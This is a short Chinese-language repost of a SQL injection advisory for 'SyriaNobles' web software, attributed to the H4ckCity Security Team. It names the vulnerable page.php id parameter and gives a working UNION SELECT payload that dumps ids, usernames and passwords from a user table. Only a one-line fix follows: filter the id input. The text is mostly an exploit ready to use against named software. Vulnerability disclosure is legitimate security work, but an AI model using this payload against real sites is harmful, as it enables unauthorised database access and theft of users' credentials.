标题: SyriaNobles SQL Injection Vulnerabilitiy 作者: H4ckCity Security Team farbodmahini www.2cto.com WwW.H4ckCity.Org 影响所有版本 开发者: http://www.syrianobles.com/syrianobles/english/ 测试平台: GNU/ Linux Ubuntu - Windows Server - win7 示例 http://www.2cto.com /page.php?id=[SQL] # # [~] SQL : # # -1+union+select+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11+from+user # # 修复 过滤page.php参数id输入
查看更多关于SyriaNobles sql注射缺陷及修复 - 网站安全 - 自学p的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12680